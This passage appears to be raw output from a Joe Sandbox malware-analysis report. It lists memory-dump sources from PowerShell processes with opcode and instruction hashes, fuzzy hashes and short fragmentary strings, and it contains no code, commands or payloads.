                                                                                                          • Instruction ID: 4b34d17e2d7eacaec0a7dbf7b0886230b8fcbd3668eb9208fe4a47ea6095e967
                                                                                                          • Opcode Fuzzy Hash: cef32c57d6befc4df19bf603df45bfbde5401329ce657c8a7ad69e3bd8857b89
                                                                                                          • Instruction Fuzzy Hash: 9B3104D6D2EEA68FE7B6AE78996517C6ED5AF01610B6800FAD4CCC31C2DD0C7C054292
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 948540e23390388c736b172700fc56e8826a784c65a7de455f9151e4ebc4f324
                                                                                                          • Instruction ID: cca845af40cba3c40733095610c09d42c95be9b9f03e5ec7ebaca48bffd592d0
                                                                                                          • Opcode Fuzzy Hash: 948540e23390388c736b172700fc56e8826a784c65a7de455f9151e4ebc4f324
                                                                                                          • Instruction Fuzzy Hash: 5121D373B0DA194FEB99A92CF9421FDB3D1DB85220B1405BFC58EC2592ED19B8178285
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 11169312fbc0306cfe8e5ae81e2c07cb7e713b73e143bf98370971d7492e3c10
                                                                                                          • Instruction ID: a44b9f78273dae83e7f168b99c6aa401272dcf355684282de15fc42cc43e8008
                                                                                                          • Opcode Fuzzy Hash: 11169312fbc0306cfe8e5ae81e2c07cb7e713b73e143bf98370971d7492e3c10
                                                                                                          • Instruction Fuzzy Hash: B52127A2A1DB9A4FE3F9BE38895127866C6EF41250B6800F9D48CC31C2ED19BC458242
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1724680584.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4aea0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2eb2cc7add17023f9ce81b1176cf96c036db171570bb11ecff854c1e9e5ed27e
                                                                                                          • Instruction ID: 22996a564de2fd17c293559c7229af8021a42a157c19b3bba708d41cb75d5b99
                                                                                                          • Opcode Fuzzy Hash: 2eb2cc7add17023f9ce81b1176cf96c036db171570bb11ecff854c1e9e5ed27e
                                                                                                          • Instruction Fuzzy Hash: 61315AB095C64ECEFBB8BF24CD5ABF93298FF51318F604178D42D86092CA386985CB11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dcf3f38606429f1f918b741f371b9877e542aa8286f1aed9d7f7c82205c1c516
                                                                                                          • Instruction ID: e04f4af8c230309c177858beb5eced14565f1e697e2d20f9a70f9713fe785676
                                                                                                          • Opcode Fuzzy Hash: dcf3f38606429f1f918b741f371b9877e542aa8286f1aed9d7f7c82205c1c516
                                                                                                          • Instruction Fuzzy Hash: 7E21B5D6D0F7C64FE7A1AE7889651682F959F56640B2800FED0C8C71E3D9086C0DC356
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6b1a0d6e8663881800f7e93f09b72c768807864b85d237eb94c3934024059af7
                                                                                                          • Instruction ID: 1a107040b56b1d309cc92e4ce348b668b033bc7f8d94d23b023f0fd0e26b88f4
                                                                                                          • Opcode Fuzzy Hash: 6b1a0d6e8663881800f7e93f09b72c768807864b85d237eb94c3934024059af7
                                                                                                          • Instruction Fuzzy Hash: 9B11E992A0EAC61FE796FE7888514696BD1EF1265171805FED4CDCB1C3E809AC458392
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1724680584.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4aea0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 830f2c1b88151092942228db4919a9821be5d56d214cd312c557364d362a474f
                                                                                                          • Instruction ID: 3e69d6aacc35107eb436e0e5c3f6c3f14511d5da4f0a7e6169ad3115a6d3b6c2
                                                                                                          • Opcode Fuzzy Hash: 830f2c1b88151092942228db4919a9821be5d56d214cd312c557364d362a474f
                                                                                                          • Instruction Fuzzy Hash: 2901A77010CB0C8FD744EF0CE051AA5B3E0FB89320F10056DE58AC3651D632E882CB41
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a60f28748166ada31b584f985bf58152ae679887ffd1d56aa4acd650a79fe504
                                                                                                          • Instruction ID: 9c5839dfdc63aeb8597c157904b561db1a3a64fefe8e707b8a2db67457b238e4
                                                                                                          • Opcode Fuzzy Hash: a60f28748166ada31b584f985bf58152ae679887ffd1d56aa4acd650a79fe504
                                                                                                          • Instruction Fuzzy Hash: 49F0E577A1CE0C4DA386EA7C94061F973D6DFD5131B5541B7C48EC3192EE15E4074251
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c29740f031c3f75f44482cf990385b95e36ea285dc40c604642f5b6a744dfee7
                                                                                                          • Instruction ID: 0188da6fd2b8f8c86a395318e15b6878a943778ae2a8d17df6a45480fb43f853
                                                                                                          • Opcode Fuzzy Hash: c29740f031c3f75f44482cf990385b95e36ea285dc40c604642f5b6a744dfee7
                                                                                                          • Instruction Fuzzy Hash: 7CE0E5B2B1EA090EFB8DAD2CA9121BD62D2DF8512175404BFC58EC24C3ED19F8170241
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2753250751.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_2940000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: \VIn
                                                                                                          • API String ID: 0-1126139159
                                                                                                          • Opcode ID: 34aa62b0660dfc8948733d82ec6c235b8b29da01d1d978157c1bd25de60f87ee
                                                                                                          • Instruction ID: bae0ea296e6e44a4708730ac46c7202eabd2565ec03a4dc2861b1ee57531c2cf
                                                                                                          • Opcode Fuzzy Hash: 34aa62b0660dfc8948733d82ec6c235b8b29da01d1d978157c1bd25de60f87ee
                                                                                                          • Instruction Fuzzy Hash: 3DB16D70E00209CFDB15CFA9D885BAEBBF6BF88314F148529D855AB294EF749941CF81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2753250751.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_2940000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cd2357bd25e9cb138abcff6a45b67b3fa7b07a87a01603e5e7c3652daa99fbb4
                                                                                                          • Instruction ID: 10633704d61c218a6b6ed13fc66859e3c130f9cd4ab5de2923ac603f50580c4a
                                                                                                          • Opcode Fuzzy Hash: cd2357bd25e9cb138abcff6a45b67b3fa7b07a87a01603e5e7c3652daa99fbb4
                                                                                                          • Instruction Fuzzy Hash: 88B17F71E0020ACFDB14CFA9D885BADBBF2BF88358F148129D815E7694EF749845CB81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$(fal$(fal$(fal$(fal$(fal$(fal$x.Rk
                                                                                                          • API String ID: 0-828597204
                                                                                                          • Opcode ID: c5f1e84e599182c086fa654ea4b62523f2bcc88f9d4d9ce9dc9dfd02f0bbe710
                                                                                                          • Instruction ID: 5ef49fa742ba0104aa355866723e05f5450356b7f45a81f061d75fabd651b527
                                                                                                          • Opcode Fuzzy Hash: c5f1e84e599182c086fa654ea4b62523f2bcc88f9d4d9ce9dc9dfd02f0bbe710
                                                                                                          • Instruction Fuzzy Hash: 69622874E11208CFEB65DF98C990BAAB7F2AF89300F6481A9D5099B351CB71DD81CF61
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2789683657.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6930000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$(fal$x.Rk$x.Rk$x.Rk$-Rk
                                                                                                          • API String ID: 0-2395378272
                                                                                                          • Opcode ID: bcc6a84d7040775431228c85dd171a4b202a31eb9644f2ef36c9b3d30685a5fe
                                                                                                          • Instruction ID: 6d237b92b9d150738a772c2be621cea87237758a555d5c0cfb6592f7ee75db00
                                                                                                          • Opcode Fuzzy Hash: bcc6a84d7040775431228c85dd171a4b202a31eb9644f2ef36c9b3d30685a5fe
                                                                                                          • Instruction Fuzzy Hash: 7C627274A402199FE764DB28C984BEEB7B2BF85304F1085E5E509AB781CB719E81CF91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2753250751.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_2940000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 8NIn$h]In$h]In$h]In$IIn
                                                                                                          • API String ID: 0-27999252
                                                                                                          • Opcode ID: 4fe910e0e84352b0c332b03d8dede068d061d6e8ae4ad9765c10056bc7fa7442
                                                                                                          • Instruction ID: e7197e3e8329df2d7cac19c471b92351bd0727c5e522af2625e2c7ac58681efa
                                                                                                          • Opcode Fuzzy Hash: 4fe910e0e84352b0c332b03d8dede068d061d6e8ae4ad9765c10056bc7fa7442
                                                                                                          • Instruction Fuzzy Hash: 70225F34B00118CFDB25DB75D864AAEB7B6AF89304F1484A9D50AAB391DF35DD41CF81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$(fal$x.Rk$x.Rk$-Rk
                                                                                                          • API String ID: 0-1712703543
                                                                                                          • Opcode ID: aeada9c9fd99939f8efaf81034eee59afd189f4169da4580296f96cbe8dde831
                                                                                                          • Instruction ID: be0b29c9306e8fa5fe8ed746f2adbfa6f50b2573e3baf899a658f26f6542b06d
                                                                                                          • Opcode Fuzzy Hash: aeada9c9fd99939f8efaf81034eee59afd189f4169da4580296f96cbe8dde831
                                                                                                          • Instruction Fuzzy Hash: 89F1B274A002158FEB24DB68C850FAEB7B3AB85740F1085E5E50A6F791CB71DD818FA5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$(fal$(fal$(fal$x.Rk
                                                                                                          • API String ID: 0-3862227468
                                                                                                          • Opcode ID: 0ec440b5f5970614339bc60ca15b30a2ac0dd4c774aeace1bc2ae17338d6ec0c
                                                                                                          • Instruction ID: 93ac11fe62f3b735a5c9169e890c52537323fcdfab81221b25c64e8f6ef9b3f9
                                                                                                          • Opcode Fuzzy Hash: 0ec440b5f5970614339bc60ca15b30a2ac0dd4c774aeace1bc2ae17338d6ec0c
                                                                                                          • Instruction Fuzzy Hash: 0FB19E74F143049FEB54EB68C445BAEB7F3AB88301F148068E406AB795DB71DD81CBA5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$(fal$(fal$x.Rk
                                                                                                          • API String ID: 0-201934631
                                                                                                          • Opcode ID: 919b453d8de8c790af979a43f8a0b3e6313d59dda3c2fb6a4c2465418c62be96
                                                                                                          • Instruction ID: c2d956379dc473b6b0007392065ad618381daed43c97984b31cb65f1698e5b0c
                                                                                                          • Opcode Fuzzy Hash: 919b453d8de8c790af979a43f8a0b3e6313d59dda3c2fb6a4c2465418c62be96
                                                                                                          • Instruction Fuzzy Hash: 0C623E75E01204CFFB54CB59C580B9AB7B2AF89304F25C1A9E9099B356CB72ED41CFA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2789683657.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6930000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$x.Rk$x.Rk$-Rk
                                                                                                          • API String ID: 0-3087138870
                                                                                                          • Opcode ID: 076f56910ff60d1e63c0f85492ce9675c877cebee24b357166adfc3ff7bd2ff4
                                                                                                          • Instruction ID: 497019f62dcc2f713d9124352d52ed780b2e50c7a42ecdcf7aff7412560d0c10
                                                                                                          • Opcode Fuzzy Hash: 076f56910ff60d1e63c0f85492ce9675c877cebee24b357166adfc3ff7bd2ff4
                                                                                                          • Instruction Fuzzy Hash: 35F1B274A402189FE764EB68C844BAEB7F2EF85700F1084E5E509AF791CB71DE818F95
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$(fal$x.Rk
                                                                                                          • API String ID: 0-2846978356
                                                                                                          • Opcode ID: 78abf758eb1a147feac34a18bf7fa196a9a734cad540dc869576e4fab73bbbf9
                                                                                                          • Instruction ID: 69dd35a021147fddb566cfbe1c377c3e96de89e92c546b1383ee0e35cdcf2c27
                                                                                                          • Opcode Fuzzy Hash: 78abf758eb1a147feac34a18bf7fa196a9a734cad540dc869576e4fab73bbbf9
                                                                                                          • Instruction Fuzzy Hash: CF423F75E01204CFFB54CB59C980B9AB7B2AF89304F25C1A9E9099B356C772ED41CFA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: h2Tk$h2Tk$x.Rk
                                                                                                          • API String ID: 0-1814744003
                                                                                                          • Opcode ID: b7102bde51ed4b379219d35884444c58a44dec9234be5b43f6b65f0752ba4d2e
                                                                                                          • Instruction ID: 67b2b246bfb9183da7ad299a932fbf14bca71654b1cab1acf537dba2e343f2e9
                                                                                                          • Opcode Fuzzy Hash: b7102bde51ed4b379219d35884444c58a44dec9234be5b43f6b65f0752ba4d2e
                                                                                                          • Instruction Fuzzy Hash: 8A223F75F10204AFEB54CB58C450BAABBB2EF84304F148055E9095F756CBB6EE82CFA5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$(fal$x.Rk
                                                                                                          • API String ID: 0-2846978356
                                                                                                          • Opcode ID: 63706663c18eb0f35573400e4f495ea6401bf06d0312cbf003ff44d5c1b25de1
                                                                                                          • Instruction ID: 89a564667b00a68a86698682aaa5c04a7c80b3fb2c784a6e06d622df175f99d1
                                                                                                          • Opcode Fuzzy Hash: 63706663c18eb0f35573400e4f495ea6401bf06d0312cbf003ff44d5c1b25de1
                                                                                                          • Instruction Fuzzy Hash: D0A1A074E143009FEB54EB68C444BAEB7F3AF88304F1480A9E4056B791DB75ED81CBA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: x.Rk$-Rk
                                                                                                          • API String ID: 0-1824525259
                                                                                                          • Opcode ID: 9f7c68eced7afa07bb1ac6bde0f484a45fa9ea5ce4615254467c86dc29038b51
                                                                                                          • Instruction ID: a4fda2addadf8b0a8aee606b823824e93b7653bec093b8448e0b07dbe9d2541b
                                                                                                          • Opcode Fuzzy Hash: 9f7c68eced7afa07bb1ac6bde0f484a45fa9ea5ce4615254467c86dc29038b51
                                                                                                          • Instruction Fuzzy Hash: D152B731E043148FEB64DB68C850BAEB7B2AF85344F1485AAD51A9F391CB71DD81CFA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: h2Tk$x.Rk
                                                                                                          • API String ID: 0-2298985588
                                                                                                          • Opcode ID: b65c1170d5c3d8f37596c937e99b72f7a9ace47b5ee3aec454ebab9548694f4a
                                                                                                          • Instruction ID: 54b4e6b5e699f86da8260cdd281884565b728b81e6d3b2be401fec4d8aa9dd4e
                                                                                                          • Opcode Fuzzy Hash: b65c1170d5c3d8f37596c937e99b72f7a9ace47b5ee3aec454ebab9548694f4a
                                                                                                          • Instruction Fuzzy Hash: E3324075F10204AFEB54DB58C450BAABBF2AF84304F14C065E9095F755CB72ED82CBA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$x.Rk
                                                                                                          • API String ID: 0-1638397954
                                                                                                          • Opcode ID: ab0c1895c04d1b6e97b69c2700436d689e61e88b0886ae31d353e70b5c4b3925
                                                                                                          • Instruction ID: c39b263253486a84bcb88f2cb321deda28035a0669c00358c059ca24e6b51ea3
                                                                                                          • Opcode Fuzzy Hash: ab0c1895c04d1b6e97b69c2700436d689e61e88b0886ae31d353e70b5c4b3925
                                                                                                          • Instruction Fuzzy Hash: EC325075E01204CFFB54CB58C950B9AB7B2AF85304F2481A9E9099F352CB72ED81CFA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 84_l$84_l
                                                                                                          • API String ID: 0-2203518386
                                                                                                          • Opcode ID: 476116bfd2bdd4b9fc0fad0c29e5ee198a203cd3ecd6a7c9e30ca6264e77d352
                                                                                                          • Instruction ID: 5b0d56a9a9359eb160a1c0483ab08f33fc7e023ef08412c298098956a877d2cc
                                                                                                          • Opcode Fuzzy Hash: 476116bfd2bdd4b9fc0fad0c29e5ee198a203cd3ecd6a7c9e30ca6264e77d352
                                                                                                          • Instruction Fuzzy Hash: C8121732F043459FEF699F69C81066ABBF2AF85614B1880ABD446CB252DB31CD45C7B2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: h2Tk$x.Rk
                                                                                                          • API String ID: 0-2298985588
                                                                                                          • Opcode ID: d235f1f0bcfc7cfde66262aadeb0a94390d2ab198df12cbbc12401be7d19dbf1
                                                                                                          • Instruction ID: 37b0763f9586de8f6281dca87dc2ec35ef5b299a39c6ae6b28acc76fac421aef
                                                                                                          • Opcode Fuzzy Hash: d235f1f0bcfc7cfde66262aadeb0a94390d2ab198df12cbbc12401be7d19dbf1
                                                                                                          • Instruction Fuzzy Hash: 3F223D75F11204AFEB54CB58C451BAABBB2EF84304F14C059E9095B756CBB2ED82CFA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 84_l$84_l
                                                                                                          • API String ID: 0-2203518386
                                                                                                          • Opcode ID: 3e505629683d3b7da31423c04c123a6ac2fb8696bdbe9241792ba0506972212a
                                                                                                          • Instruction ID: 76a36640916f100ec217dbaa115b066d3103da7497c34492d5140b05f25f2ac1
                                                                                                          • Opcode Fuzzy Hash: 3e505629683d3b7da31423c04c123a6ac2fb8696bdbe9241792ba0506972212a
                                                                                                          • Instruction Fuzzy Hash: 58C1E431F043069FFF55DF6CC444AAABBB2AF86211F1480BAD4468F692DB31D945CBA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: x.Rk$-Rk
                                                                                                          • API String ID: 0-1824525259
                                                                                                          • Opcode ID: b8ea2fdfc1f9b222bc91630e0c8dda2967e6e859166bd5648f2bb1753b51e1eb
                                                                                                          • Instruction ID: 00baee6c843940bd1f91efc5ce1c871ba701e3ddcaff5caf91670c73603e7c84
                                                                                                          • Opcode Fuzzy Hash: b8ea2fdfc1f9b222bc91630e0c8dda2967e6e859166bd5648f2bb1753b51e1eb
                                                                                                          • Instruction Fuzzy Hash: 6DD1A074E042059FEB58DBA8C450B9EB7B2AF89305F69C069E4056F395CBB1DC42CFA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: x.Rk$-Rk
                                                                                                          • API String ID: 0-1824525259
                                                                                                          • Opcode ID: c2de91c91e595cb8892763bae515c18c3f0a149bbf798257422872b4fccc6b18
                                                                                                          • Instruction ID: 886e5665b1befbbe53caadd121af48d52c14e7d40f9bcf18f1299d62374b2fed
                                                                                                          • Opcode Fuzzy Hash: c2de91c91e595cb8892763bae515c18c3f0a149bbf798257422872b4fccc6b18
                                                                                                          • Instruction Fuzzy Hash: A1B18074E042059FEB54DB68C440B9EB7B2AF89304F1AC069E4056F395CBB5EC42CFA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2753250751.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_2940000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: \VIn$\VIn
                                                                                                          • API String ID: 0-1414648258
                                                                                                          • Opcode ID: 9f9c19f2b1d41c4046eb9aaf2e50e6bbfd25879b02b9033d2273e48b9400a65f
                                                                                                          • Instruction ID: 864008adc36974455498f2d235d8f380b8d2756ed2a595a514a2416a1cb3f024
                                                                                                          • Opcode Fuzzy Hash: 9f9c19f2b1d41c4046eb9aaf2e50e6bbfd25879b02b9033d2273e48b9400a65f
                                                                                                          • Instruction Fuzzy Hash: CB716B71E0020ADFDB10CFA9C885BDEBBF5BF88314F148129E414AB694EB759846CF91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2753250751.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_2940000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: \VIn$\VIn
                                                                                                          • API String ID: 0-1414648258
                                                                                                          • Opcode ID: 9c790b0a8459a61c888230cf264e926d59845bcc01a9921f2d7de6894b2c500a
                                                                                                          • Instruction ID: fb5a28dbba50a8d7865b28c28f8d502838a752a19e63167ca8a654ad06614aee
                                                                                                          • Opcode Fuzzy Hash: 9c790b0a8459a61c888230cf264e926d59845bcc01a9921f2d7de6894b2c500a
                                                                                                          • Instruction Fuzzy Hash: C7715C71E0020ADFDF14CFA9C884BDEBBF6AF88314F148129D415A7654EB759846CF91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2753250751.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_2940000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: h]In$IIn
                                                                                                          • API String ID: 0-801079226
                                                                                                          • Opcode ID: 8958f384fe84e493577d0751155693d965b178f2f991f90cdbc413d7cc9045d8
                                                                                                          • Instruction ID: a431f238bc4dbbf2eeb4077e4b60f1bc64eb35e786441258d3f83da9bb59dfce
